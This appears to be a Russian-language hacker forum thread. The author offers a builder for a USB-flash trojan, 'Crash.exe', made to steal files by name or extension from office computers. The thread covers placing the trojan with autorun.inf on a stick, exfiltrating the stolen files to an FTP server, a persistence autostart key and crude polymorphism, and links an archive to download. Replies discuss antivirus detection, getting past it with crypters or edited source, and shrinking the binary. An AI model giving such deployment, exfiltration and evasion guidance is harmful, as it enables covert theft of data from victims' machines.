Представляю вам свою мелкую проектину.. Многим конечно прога покажется недостаточно насыщеной возможностями и небогатая на оригинальность решений и реализации, но это всего-лишь скромная софтина, поэтому просьба не проявлять особого рвения к её растлению и критике, короче кому не понравилось лучше не пишите ни чего ибо оправдываться перед критикой за софтину которая в общем-то ни стоит и выеденного яйца просто лень.... Теперь собственно о проге.. Эта прога представляет собой простенький билдер простенького флэшечного троя. Трой предназдначен для совершения мелкого внутриофисного пиздинга файлов. Ниже я приведу скрин и небольшое описание о трое правилах использования и создания.. Для создания троя необходимо выбрать опции и нажать на кнопку "Создать". После этого в папке с прогой появится файл Crash.exe - это и есть ОНО... Для использования необходимо разместить трой вместе с файлом autorun.inf на флеху и вставить флэху в комп предпогагаемой жертвы.. После этого подождав несколько минут просто достать флэху и в папке с троем на флешке (лучше сделать эту папку скрытой) в каталоге findfile окажутся все файлы которые определены маской.. либо если выбраны опции отправки на ftp будут засланы на ftp, отсылка на фтпшник будет сделана только если была извлечена флешка из компа раньше того как файлы на неё сохранены... В том случае если будет найдено несколько файлов с одинаковым именем в конце имени файла будет добавлена комбинация из трёх больших случайных английских букв (что бы не было перезаписи).. Выбирать файлы для поиска можно по расширению и/или по имени файла... (например можно найти файлы ttt.yyy uuu.ooo и все файлы с расширением .ini и .cfg)... Эсли поставить опцию "удаление", то после удачной отправки трой удалить автозагрузочный ключ, в противном случае трой будет спамить вашь ftp до китайской пасхи))) В трое имеется небольшая полиморфность (2-5% мусора) - это конечно "не фонтан", но всё же.. При желании вы можете сгенерировать вместе с ехе и его исходник (он на Delphi).. Я не предусматривал каких-либо средств по уменьшению размера троя (ибо было лень), поэтому размер непаканых троев после билда в зависимости от настроек составляет от 40 до 48 кб, после пака соответственно вдвое меньше... Так же трой совсем не расчитан на какой-либо обход каких-либо хитростей... В следующей версии размер будет меньше и добавится несколько опций. Вот линк на кач : virusoff.pisem.su/Crash.rar
Пока что мы имеем вот такую статистику: Т.е. по честному определяет билд только касперский, он стянул из под хайда с форума хакерок.орг (я там чуть раньше размемстил).. Остальные видимо ворчат на способ автозагрузки... В общем либо юзаем крипты, либо банально ручками правим сорци и будет счастье...
Для того что бы сделать 18 кб нужно sysutils выкинуть.. Если убрать ещё и windows то будет около 16 кб. Если избавиться от стринг и убрать RTL то получится 5,5 кб.. Далее можно по методу который приныто называть методом MS-Rem-а можно с помощью ассемблерной компиляции получить сайз около 2,5 кб, хотя такой же сайз выйдет если упаковать fsg2 проект компилированный без RTL.... Начну с малого - избавлюсь от Sysutils и Windows...
Простейший вариант это узнать просто скачать прогу и глянуть... Принцип стар как мир - создание текстового файла (исходника троя), и его компиляция. Все модули необходимые для компила и компилятор тащатся с прогой... Вот и весь принцип..
для этого достаточно написать свой компилятор, но если ты задаёшь такой вопрос то скорей всего твоих знаний , которыми ты сейчас обладаешь тебе не хватит даже для написания простейшего компилятора-примера... поэтому остаётся либо юзать этот метод либо можно просто (что кстати весьма не сложно), сделать конфигуратор.. для этого будет либо патчить сам фай заменяя в нем необходимые байты своими, либо написать программу что бы она считывала из конца себя все настройки и опции в этом случае настройки будут дописываться в конец файла, например ввиде записи... Минусом конфигураторов является то что почти невозиможно добиться с помощью них полиморфности (можно конечно "завести" в коде множество мест куда можно писать всё что угодно и при создании забивать их мусором, но это будет не совсем полиморфностью и "выкупится" антивирями "токо в путь")...